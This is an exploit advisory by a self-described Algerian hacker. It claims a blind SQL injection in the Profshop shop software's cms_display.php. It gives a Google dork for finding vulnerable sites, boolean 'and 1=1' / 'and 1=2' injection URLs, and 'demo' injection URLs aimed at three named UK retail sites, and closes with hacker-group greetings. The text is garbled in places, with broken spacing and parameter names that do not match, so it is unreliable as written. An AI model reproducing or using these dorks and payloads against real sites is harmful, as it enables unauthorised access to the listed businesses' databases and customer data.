# Exploit Title: Profshop (cms_display.php) <= Blind SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com | Caddy-Dz@exploit-id.com
# Category: webapps
# Google Dork: intext: "powered by Profshop. co. uk"
# Tested on: [Windows Vista Edition Int é grale]
####
[*] # Explain! T:
# Http://www.bkjia.com/cms_display.php? Content_id = 3 + and + 1 = 1 -- [*] True
# Http://www.bkjia.com/cms_display.php? Id = 3 + and + 1 = 2 -- [*] False
# Http://www.bkjia.com/cms_display.php? Id = [SQLI] [*] Ev! L
###
[*] Demo:
Http://www.cpupholstery.co.uk/cms_display.php? Content_id = 3 + and + 1 = 1 --
Http://www.goldlabeldirect.co.uk/cms_display.php? Content_id = 2 + and + 1 = 1 --
Http://www.pitbullfightwear.co.uk/cms_display.php? Content_id = 2 + and + 1 = 1 --
###
[*] Peace From Algeria
###
===================================== ** Algerians Hackers ** = ==============================================
# Greets:
KedAns-Dz & ** All Algerians Hackers **, jos_ali_joe, All Exploit-Id Team, (exploit-id.com)
(1337day.com), (09exploit.com), All My Friends: T! RiRou, ChoK0, MeRdaw! , CaRras0, StiffLer,
MaaTar, St0fa, Nissou, RmZ... others